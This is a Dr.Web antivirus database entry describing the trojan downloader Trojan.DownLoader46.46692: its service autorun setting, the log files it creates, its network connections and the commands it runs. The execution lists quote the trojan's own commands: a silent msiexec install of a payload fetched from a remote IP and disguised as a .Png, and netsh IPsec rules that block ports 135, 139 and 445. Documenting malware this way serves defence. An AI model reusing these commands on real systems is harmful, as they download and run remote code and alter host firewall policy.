Trojan.DownLoader46.46692

Added to the Dr.Web virus database: 2024-01-11

Virus description added: 2024-03-30

Technical Information

To ensure autorun and distribution

Sets the following service settings

[HKLM\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'

Modifies file system

Creates the following files

%WINDIR%\dbcode21mk.log
%WINDIR%\setupact64.log

Network activity

Connects to

'11#.#08.223.140':13342

TCP

HTTP GET requests

http://11#.###.223.140:13342/2E0ECB2F.Png via 11#.#08.223.140

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /c for /l %i in (1,1,10) do (Msiexec /i http://113.108.223.140:13342/2E0ECB2F.Png /Q)' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' interface ipv6 install' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=qianye' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Filter1' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1' (with hidden window)
'%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=qianye assign=y' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c for /l %i in (1,1,10) do (Msiexec /i http://113.108.223.140:13342/2E0ECB2F.Png /Q)
'%WINDIR%\syswow64\msiexec.exe' /i http://113.108.223.140:13342/2E0ECB2F.Png /Q
'%WINDIR%\syswow64\netsh.exe' interface ipv6 install
'%WINDIR%\syswow64\netsh.exe' ipsec static add policy name=qianye
'%WINDIR%\syswow64\netsh.exe' ipsec static add filterlist name=Filter1
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
'%WINDIR%\syswow64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block
'%WINDIR%\syswow64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
'%WINDIR%\syswow64\netsh.exe' ipsec static set policy name=qianye assign=y

Attempts to shut down the Windows operating system.

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial